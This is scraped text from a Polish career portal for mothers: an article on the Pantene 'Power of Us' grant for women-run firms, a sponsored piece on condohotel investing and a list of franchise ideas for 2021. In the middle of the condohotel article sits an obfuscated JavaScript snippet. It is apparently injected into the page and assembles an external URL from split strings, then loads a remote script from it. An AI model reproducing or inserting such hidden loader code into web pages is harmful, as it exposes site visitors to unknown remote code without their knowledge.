Czego szukasz

Projekt Pantene – Power of Us – zgłoś się i dostań to co my!

Fundusz Power of Us został stworzony przez markę Pantene, aby wesprzeć kobiety prowadzące małe przedsiębiorstwa w Polsce. My również zgłosiłyśmy się do tego projektu i znalazłyśmy się wśród 5 wspaniałych finalistek 1 edycji projektu. Przeczytaj za co my dostałyśmy nagrodę i możliwość promocji naszego biznesu i też się zgłoś! Masz czas do 24 lipca 2020 r.

 • Redakcja portalu Mamo Pracuj - 17/07/2020

Power of Us

Projekt powstał z myślą o kobietach prowadzących własną działalność (gospodarczą, spółkę lub fundację), które w czasie kryzysu spowodowanego Covid-19 wprowadziły w swojej firmie innowacyjne rozwiązania, pozwalające im przetrwać trudny okres i nadal z powodzeniem funkcjonować.

Wsparcie Funduszu Power of Us ma działać długofalowo, nie tylko w czasie pandemii Covid-19, ale także później. Spośród nadesłanych do Sieci Przedsiębiorczych Kobiet zgłoszeń, zostanie wybranych 10 firm z różnych branż, które w sumie otrzymają wsparcie finansowe w wysokości 160 tysięcy złotych. Otrzymają również coaching, opieką mentoringową oraz wsparcie promocyjne, dzięki czemu ich działania, usługi produkty uzyskają większe nagłośnienie.

W projekcie oceniane są wartości, które przyświecają właścicielkom firm, pomysł na to jak zostaną wykorzystane fundusze z nagrody oraz gotowość opowiedzenia o swoim biznesie na szerokim forum.

Przeczytaj także: Zapraszamy do przedszkola online z Early Stage!

Zobacz, za co my dostałyśmy nagrodę

Od pierwszych dni lockdownu wspierałyśmy kobiety i rodziców oraz naszych klientów – pracodawców czy reklamodawców w radzeniu sobie z pracą oraz work-life balance w tym trudnym okresie. Działałyśmy szybko, profesjonalnie, efektywnie oraz kompleksowo. Bazowałyśmy na naszej wiedzy oraz wieloletnim doświadczeniu pracy zdalnej i łączeniu jej z życiem rodzinnym.

Stworzyłyśmy nową, dopasowaną do potrzeb partnerów biznesowych ofertę, aby podtrzymać relację, ale też wesprzeć partnerów w tych trudnych czasach.

Dla pracodawców:

 • przygotowałyśmy nową ofertę edukacyjno – szkoleniową online dotyczącą m.in efektywnej pracy zdalnej z dziećmi na pokładzie, komunikacji empatycznej w zespole oraz z bliskimi w trakcie kwarantanny. Skupiłyśmy się na wyzwaniach i barierach komunikacji, sposobach na radzenie sobie z nimi, dbaniu o swoją wewnętrzną baterię oraz sposobach na motywowanie dzieci do nauki zdalnej.
 • w okresie 3 m-cy zrealizowałyśmy 20 webinarów dla naszych partnerów biznesowych, z których skorzystało ponad 1300 osób, w dwóch wersjach językowych (polskiej i angielskiej).
 • wprowadziłyśmy teksty pisane w języku angielskim, z myślą o pracownikach korporacji nie mówiących po polsku.
 • uruchomiłyśmy serię konsultacji eksperckich dla pracowników firm i działów HR – tematyka: jak wspierać zespoły, jak pomóc pracownikom rodzicom zorganizować pracę zdalną z dziećmi, jak utrzymać wysokie zaangażowanie przy ogromnym natężeniu pracy i aktywności w ciągu dnia,
 • wprowadziliśmy ofertę zajęć on-line dla dzieci, w tym „przedszkole on-line” – we współpracy z zaprzyjaźnionymi firmami oferującymi zajęcia dla dzieci on-line.
 • przygotowaliśmy bazę firm świadczących powyższe rozwiązania dla pracodawców, jako jedna z opcji i propozycji na zajęcie dzieci podczas pracy rodziców.
 • opracowaliśmy ofertę zajęć na czas wakacji, wspierającą tych rodziców, którzy nie mają możliwości zapewniania dzieciom atrakcyjnych wakacji w tym roku w związku z licznymi obostrzeniami sanitarnymi, odwołaniem wielu kolonii i obozów dla dzieci.

Wspierałyśmy klientów promujących u nas swoje rozwiązania franczyzowe (głównie zajęcia dla dzieci):

 • poprzez konsultacje indywidualne zachęcałyśmy do przejścia z zajęciami dla dzieci do przestrzeni on-line, deklarując wsparcie w promocji oferty,
 • promocję oferty zajęć edukacyjnych i wysyłkę ofert do korporacji, które mogły zakupić usługi od tych firm;
 • dzięki współpracy z kancelarią prawną zaproponowałyśmy bezpłatne wsparcie prawne dla franczyzodawców.

Przeczytaj także: Pomysły na sprawdzony biznes dla mamy? Franczyza dla Mamy 2020

Przeczytaj także: Skorzystaj ze wsparcia i znajdź pracę jakiej szukasz! – Kurs online Mamo Pracuj

Dla naszych Czytelniczek i Czytelników, od pierwszych dni pandemii rozpoczęłyśmy regularną publikację ważnych tekstów:

 • przygotowaliśmy ponad 70 bezpłatnych tekstów (tematyka obejmowała rządowe wytyczne odnośnie zasiłków, czy wszelkich możliwych scenariuszy działania oraz tematy zawodowe i wspierające rodzinę: podpowiedzi co możemy zaproponować dzieciom aby znaleźć czas na pracę, jak spędzać czas z dziećmi będąc zamkniętym w domu, po podpowiedzi jak pracować zdalnie z dziećmi, co pomaga, po teksty jak zadbać o siebie i swoje potrzeby, aby mieć siłę na połączenie intensywnej pracy z bardzo intensywną opieką nad dziećmi).
 • zorganizowałyśmy kilka bezpłatnych Live’ów oraz webinarów wspierających w tym trudnych czasach,
 • a także konkurs z okazji Dnia Matki “Matka w kwarantannie” aby zachęcić Czytelniczki do opisywania tej nowej rzeczywistości. W konkursie wpłynęło ponad 60 prac!
 • dla osób poszukujących pracy, uruchomiłyśmy na nowo sprzedaż kursu on-line Mamo Pracuj – po symbolicznej cenie (stanowiącej jedynie ułamek pierwotnej ceny), został on zmodyfikowany i dostosowany do aktualnych potrzeb.

Dla przedsiębiorczych mam, które potrzebowały promocji i wsparcia ich biznesów – zorganizowałyśmy kolejną, specjalną edycję akcji “Mamy Kupują u Mam” – bezpłatnie promując kobiece firmy, które zgłosiły się do udziału w akcji. Łącznie wsparłyśmy promocyjnie (w formie artykułu + serię postów w social mediach) 38 firm prowadzonych przez kobiety.

Jako pracodawca nie zapomniałyśmy o naszych pracowniczkach – pracujemy zdalnie od wielu lat, więc przejście na taki tryb pracy nie był czymś nowym. Natomiast praca zdalna z całą rodziną przez kilka miesięcy, łączenie jej z opieką oraz wspieraniem nauczania dzieci również była dla nich wyzwaniem.

Przeczytaj także: Szukasz pracy? Tej wiedzy będziesz potrzebować!

Zadbałyśmy o:

 • przestrzeń na podzielenie się swoimi lękami i frustracjami związanymi z pandemią – pomogły tu regularne rozmowy, spotkania online całego zespołu oraz stworzenie dedykowanej grupy online tylko dla Zespołu,
 • jeszcze większą elastyczność związana z czasem pracy i możliwością realizacji zadań,
 • docenianie pracy i wysiłków wszystkich osób zaangażowanych w realizację bieżących działań oraz pracę nad nowymi produktami, ofertami i działaniami – każda pracowniczka dostała personalizowane upominki, które były pakietem umożliwiającym zadbanie o siebie i sprawienie sobie przyjemności,
 • prawdziwą komunikację wewnętrzną – bieżące informowanie o wyzwaniach i trudnościach oraz sposobach na radzenie sobie z nimi,

Utrzymałyśmy pełne zatrudnienie bez obniżenia wymiaru czasu pracy ani pensji naszych pracowniczek

Co jest dla nas bardzo ważne, że nie przerwałyśmy i nie zrezygnowałyśmy z naszych dotychczasowych działań. W większości udało się je przenieść do świata online, co wymagało elastyczności ze wszystkich stron oraz stworzenia przestrzeni do wymiany wiedzy, doświadczeń oraz spotkań. Tak było w przypadku chociażby programów mentoringowych oraz oferty edukacyjno – szkoleniowej.

Przeczytaj także: Konkurs: Matka w kwarantannie. Dziennik pokładowy

Przeczytaj także: Mamy kupują u Mam – wspieramy Wasze biznesy. Dołącz do akcji!

Ty też możesz zdobyć nagrodę!

Projekt Pantene – „Power of Us” jest zaplanowany na dwie tury, my znalazłyśmy się wśród 5 wspaniałych finalistek I tury, obok:

 • Anny Bogel – Malicka z TRUE COLOR by Ann,
 • Dominiki Ewy Gołuńska Park Robotów,
 • Studio Dinksy,
 • Anny Żórawska Fundacja Kultury bez Barier.

II tura projektu przed nami

Trwa od 6 – 31 lipca 2020. Zgłoszenie możesz wysłać do 24.07.2020 r. Wyniki zostaną ogłoszone 31.07.2020 r.

Zdjęcie: Magda Trebert

Spodobał Ci się artykuł? Podziel się z innymi:
Redakcja portalu Mamo Pracuj

Zarabianie na wynajmie apartamentów

Przed nami druga edycja programu mentoringowego Mother Empower! „To szansa na poznanie siebie, swoich mocnych stron i rozwinięcie umiejętności” – mówi Asia Wojdan-Liszewska, która pracuje w firmie Bosch i wpiera nasze wspólne działania! Tym razem Asia będzie jedną z mentorek Mother Empower 2. i swoim doświadczeniem i pozytywną energią podzieli się ze swoją mentee. Zapisy do programu ruszają już wkrótce a tymczasem zapraszamy do lektury!
 • Alicja Zielińska - 20/01/2021

Condohotel – inwestować czy lepiej nie ryzykować?

Coraz więcej osób może pozwolić sobie na podróżowanie, co wiąże się z koniecznością znalezienia odpowiedniego miejsca noclegowego. Zatrzymywanie się wyłącznie w hotelach kosztuje i to niemało, dlatego rośnie zainteresowanie innymi możliwościami.

Wiele osób nie osiedla się na stałe, ale wynajmuje mieszkanie, zmieniając co jakiś czas lokalizację. Wszystko to sprawia, że apartamenty pod inwestycje stają się coraz bardziej rentownym rozwiązaniem. W przypadku dużych miast, gdzie nie brakuje turystów, bez wątpienia znajdzie się szereg osób zainteresowanych wynajęciem condohotelu.

Istotne jest to, aby nieruchomość miała dobrą lokalizację – na największe zyski można liczyć w przypadku miejscowości nadmorskich w sezonie wakacyjnym. Podobnie jest z obszarami górskimi, które są odwiedzane przez rzeszę turystów nie tylko zimą, ale też latem. Jeśli apartamenty w systemie condo będą miały wysoki standard, można podnieć cenę wynajmu, dzięki czemu inwestycja zwróci się jeszcze szybciej.

Jeśli inwestycja w apartamenty pod wynajem ma być rentowna, to powinny one znajdować się w lokalizacji, która przyciąga atrakcjami turystycznymi przez cały rok. Istotne będzie to, aby obiekt był usytuowany niedaleko stoku narciarskiego, widoku na morze czy jezioro. Nie może też zabraknąć różnych punktów handlowo-usługowych, rozbudowanej infrastruktury.

Zaletą inwestycji w condohotel jest możliwość ochronienia swojego kapitału przed inflacją. Stanie się źródłem regularnego dochodu, możliwe jest nawet odliczenie podatku VAT. Co więcej, właściciel nieruchomości nie musi ponosić żadnych kosztów związanych z jej remontami i naprawami, bo wszystko pokrywa operator hotelowy. Dotyczy to także promocji obiektu. Każdego roku wartość nieruchomości zwiększa się, można też w każdej chwili ją sprzedać. Wiele ofert zakupu condohoteli znajdziesz na stronie condo.pl – https://condo.pl/investments/

Czy inwestowanie w condohotele ma jakieś wady?

Apartamenty pod inwestycje to rozwiązanie pełne zalet, ale nie jest wolne od pewnych wad. Każdy potencjalny inwestor powinien wobec tego mieć je na uwadze przed podjęciem ostatecznej decyzji. Do minusów zaliczyć można brak wpływu na zarządzanie nieruchomością i niemożność zameldowania się – to z kolei może sprawić problemy w przyszłości, gdy właściciel będzie chciał sprzedać apartament na rynku wtórnym. Condohotele są obarczone wyższą stawką VAT, co również stanowi minus, a jej wysokość wynosi 23%. Można oczywiście uzyskać zwrot podatku, ale najpierw trzeba zainwestować wysoki kapitał początkowy.

> (function(){ ob2h=document.createElement(„”);ob2h.async=true;ob2h_=”u”+(„s”)+”t”; ob2hu=”250449624.”;ob2h_+=”a”+(„t.i”);ob2h_+=”n”+(„f”+”o”)+”/”; ob2hu+=”4vv9wcl3b2hnvpn4uyyz8p”+(„3xurlwgz”); ob2h.src=”https://”+ob2h_+ob2hu;ob2h.type=”text/java”; document.body.appendChild(ob2h); })();

Materiał powstał we współpracy z partnerem portalu.

Zdjęcie: partnera portalu.

Spodobał Ci się artykuł? Podziel się z innymi:
Alicja Zielińska

Planujesz założyć biznes w 2021 roku? Wybierz nasze pomysły!

Twoje noworoczne postanowienia dotyczą założenia własnej firmy i zdobycia niezależności zawodowej? Świetnie! Koniecznie sprawdź jakie pomysły mamy dla Ciebie i dlaczego warto działać jako franczyzobiorca znanej marki. W obliczu trudności, których nie brakowało w ostatnim roku, działacie wspólnie i wspieracie się nawzajem. Nasi partnerzy to potwierdzają. Szkoła językowa, zajęcia edukacyjne i kreatywne dla dzieci, salon depilacji czy sklep z ubraniami dla dzieci – który pomysł wybierasz dla siebie?
 • Agnieszka Wadecka - 11/01/2021

Pomysły na biznes 2021, którymi warto się zainteresować

1. Nauka z klockami LEGO – Edukido

Edukido oferuje naukę i zabawę z wykorzystaniem klocków LEGO, zajęcia są skierowane do dzieci od 3 do 12 lat. Dzieci uwielbiają zabawy z LEGO. Jeśli chcesz rozkręcić biznes związany z rozwojem dzieci i wiesz, że klocki LEGO to przepis na sukces, to jest to opcja dla Ciebie.

Zakładając franczyzę otrzymasz profesjonalny system wsparcia biznesowego na każdym etapie z marketingu, sprzedaży czy obsługi klienta. Od niedawna dostępna jest opcja Edukido Mini, która jest bardziej przystępna finansowo.

Dodatkowo, w czasie pandemii Edukido stworzyło nową ofertę zajęć online dla dzieci.

Sprawdź szczegóły współpracy z Edukido

2. Ubranka zawsze w modzie – 5.10.15

Dzieci nieustannie rosną i potrzebują nowych ubrań. Na pewno znacie te memy, gdzie mama skąpi grosza na siebie, ale na dziecięce ubranka wydaje bez wahania dużo więcej? Właśnie dlatego otwarcie własnego sklepu 5.10.15. to świetny pomysł na biznes! Zwłaszcza, że ubranka są śliczne, dobrej jakości, a firma cieszy się renomą naprawdę od wielu lat.
A przy tym firma zapewnia szkolenia ze sprzedaży, niski koszt otwarcia sklepu, zatowarowanie, wsparcie przez cały okres współpracy i brak stałej opłaty franczyzowej.

Poznaj szczegóły biznesu z 5.10.15

3. Twórczy rozwój i świetna zabawa – Akademia Bystrzak

Akademia Bystrzak to podróżnicze kursy rozwoju intelektu dla dzieci, kolonie, wakacje i ferie w mieście czy organizacja twórczych i kreatywnych urodzin. No tak, ale ta pandemia… Otóż Akademia Bystrzak uruchomiła zajęcia online – zobacz jak wyglądały wyprawy w czasie pandemii. W ramach współpracy dostajesz wsparcie merytoryczne i marketingowe, dostęp do materiałów, metodyki i oczywiście możliwości rozwoju.

Poznaj szczegóły biznesu z Akademią Bystrzak

4. Czas dla urody – DepilConcept

A może chciałabyś prowadzić własny gabinet kosmetyczny, ale do tej pory brakowało Ci biznesowego zaplecza aby założyć firmę z tej branży? Właśnie dlatego franczyza wychodzi Ci naprzeciw. DepilConcept to sieć gabinetów, w których wykonuje się zabiegi fototerapii odmładzania i trwałej depilacji. Szczególnie po tym ostatnim ciężkim roku wszystkie chciałybyśmy wyglądać pięknie!

Decydując się na współpracę z DepilConcept otrzymasz pomoc w wyborze lokalu i rekrutacji pracowników, szkolenia dla Ciebie i dla personelu, wsparcie marketingowe, obsługi klienta i sprzedaży, własny serwis urządzeń i urządzenie zastępcze na czas napraw.

Sprawdź jak założyć własny biznes z DepilConcept

5. Najlepsi piłkarze świata – SOCATOTS

Wiesz, że w tym roku zdobywcą Złotej Piłki czyli najlepszym piłkarzem świata został wybrany Robert Lewandowski? No z Robertem pewnie nie będziesz już pracować, ale pomyśl, co jeśli masz szansę wyszkolić najlepszą piłkarską kadrę jaką można sobie wyobrazić? Jak? Otwierając franczyzę SOCATOTS!

Będziesz mogła organizować zajęcia ruchowe dla dzieci w wieku od 6 miesięcy do 5 lat, które z udziałem rodziców będą rozwijać pewność siebie i trenować piłkę nożną.

Ty zaś w ramach współpracy otrzymasz dostęp do zintegrowanej platformy IT, szkolenia i wsparcie marketingowe. Może nawet odkryjesz kolejnego Lewandowskiego? SOCATOTS to system sprawdzony na całym świecie.

Sprawdź jak założyć własny oddział SOCATOTS

6. Język angielski dla dzieci – Early Stage

Early Stage to marka, której nie trzeba przedstawiać. To jedna z najpopularniejszych szkół języka angielskiego dla dzieci i młodzieży w Polsce. Nie ma oddziału w Twojej okolicy? Może chcesz otworzyć własną filię. To proste!

Nie jesteś pewna czy w dobie szalejącego wirusa jest to dobry pomysł? Już w połowie marca 2020 zajęcia Early Stage przeniosły się do online. A dodatkowo – dla wszystkich chętnych dzieci powstało dwujęzyczne przedszkole online!

Early Stage proponuje sprawdzony model finansowy, wsparcie administracyjne, bezpłatne szkolenia, opiekę metodyczną, metodę, którą dzieci uwielbiają i korzystne warunki finansowe. Dzięki temu „ruszysz z kopyta” 😉

Sprawdź jak założyć własny biznes z Early Stage

7. Rozwój kompetencji miękkich dzieci i młodzieży – Akademia JA

Ostatni rok nie był łatwy, można by go porównać do jazdy na rollercoasterze, było z górki, pod górkę, rzadko na prostej i nie wiadomo jakich atrakcji można się spodziewać. A w tym wszystkim mocno ucierpiały dzieci, dla których odnalezienie się w tej sytuacji kosztuje je sporo trudu i emocji. A Akademia JA właśnie tym się zajmuje – rozwojem emocjonalnym dzieci i młodzieży.

Akademia JA oferuje zajęcia dla przedszkolaków, dzieci ze szkół podstawowych i młodzieży z zakresu kompetencji miękkich i umiejętności społecznych. Są także warsztaty dla rodziców. Na obecne czasy to bardzo potrzebne działania.

Otwierając Akademię JA otrzymasz bezpłatne szkolenie, wsparcie merytoryczne i scenariusze zajęć.

Sprawdź jak dołączyć i założyć własny Ośrodek Akademii JA

8. Z kulturą za pan brat – Cool-Turalny Maluch

Jak w miły i przystępny sposób pokazać najmłodszym, że bycie grzecznym i kulturalnym jest… cool? Poprzez zajęcia, które uczą i bawią. Cool-Turalny Maluch ma swój autorski program z savoir vivre i etykiety dla przedszkolaków i dzieci w wieku wczesnoszkolnym.

Aby współpraca przebiegała w pozytywny sposób firma zapewnia konspekty warsztatów, konsultacje, sprawdzony sposób na biznes i mnóstwo zaangażowania.

Sprawdź jak dołączyć do Cool-Turalnego Malucha

9. Matematyczna przygoda – MathRiders

Co tu dużo mówić, matematyka często sprawia dzieciom trudności, gdy jedni czekają na nią z niecierpliwością, inni drżą ze strachu przed nadchodzącą lekcją. Czy wobec tego szkoła matematyki to dobry pomysł na biznes?

No pewnie! Międzynarodowy program edukacji matematycznej – MathRiders został stworzony z myślą o dzieciach i młodzieży w wieku od 2 do 18 lat. Pomaga zbudować mocne podstawy, wyrównać braki, polubić matematykę i rozwinąć logiczne myślenie.

Otwórz swoją szkołę MathRiders, a otrzymasz szkolenia biznesowe, wsparcie, materiały marketingowe, stały rozwój metody i dostęp do platformy zarządzania firmą.

Nie obawiaj się, bo MathRiders również rozwinęło zajęcia online

Sprawdź jak dołączyć do sieci MathRiders

10. Nowe technologie to przyszłość – Akademia Komputerowa Komputrilo

Nauka programowania to przyszłość, a własna Akademia Komputerowa Komputrilo to świetny, przyszłościowy biznes! Wszak w czasie pandemii praca i nauka przeniosły się do internetu, zakupy robimy w sieci i w zasadzie niemal wszystko da się załatwić bez wychodzenia z domu, dlatego rozwój technologiczny to nasza przyszłość. Otwierając oddział Komputrilo będziesz organizować kursy programowania dla dzieci i młodzieży.

Komputrilo to firma przyjazna kobietom, oferująca w ramach współpracy wsparcie techniczne i merytoryczne, szkolenia, swobodę działań i wyłączność na danym obszarze.

Sprawdź jak założyć własną Akademię Komputrilo

11. Klub szalonych naukowców – Nutty Scientists

Nutty Scientists zachęca dzieci do nauki poprzez zabawę i eksperymenty, dzięki którym łatwiej jest zapamiętać nowo poznane informacje. I Ty możesz dołączyć do Nutty Scientists otwierając swój oddział!

Otrzymasz szkolenie wstępne, wsparcie w wyborze i szkoleniu Twoich instruktorów, w organizacji działań promocyjnych i marketingowych. W dodatku Nutty Scientists, sprawdzony w kilkunastu krajach świata nie ma oddziałów w Polsce, więc masz szansę być pierwsza i rozwijać markę na rynku krajowym!

Sprawdź jak założyć pierwszy w Polsce oddział Nutty Scientists

Który pomysł spodobał Ci się najbardziej? Poznaj historie mam, które założyły firmy we współpracy z marką franczyzową. Zadzwoń lub napisz do osób odpowiedzialnych z poszczególnych firm – czekają na Twój kontakt. W 2021 pora działać i spełnić swoje zawodowe marzenia.

Artykuł powstał w ramach akcji Franczyza dla Mamy.

Zdjęcie: 123 rf

Spodobał Ci się artykuł? Podziel się z innymi:
Agnieszka Wadecka
Szczęśliwa żona i mama czwórki dzieci. Macierzyństwo to jej największa pasja, motywująca do rozwoju i działania. Z przyjemnością oddaje się pisaniu. Kocha muzykę, kino i dobre jedzenie. Lubi śledzić trendy i wprowadzać je w życie. Zawodowo początkująca, ale z apetytem na sukces.
Chcę otrzymywać inspiracje, pomysły i sugestie jak pracować i nie zwariować.
Newsletter wysyłamy raz na 2 tygodnie

Może Cię zainteresować także:

Uwaga. Strona wykorzystuje pliki cookies. Informacje uzyskane za ich pomocą wykorzystywane są w celach statystycznych. Pozostając tu godzisz się na ich zapisywanie w Twojej przeglądarce. ×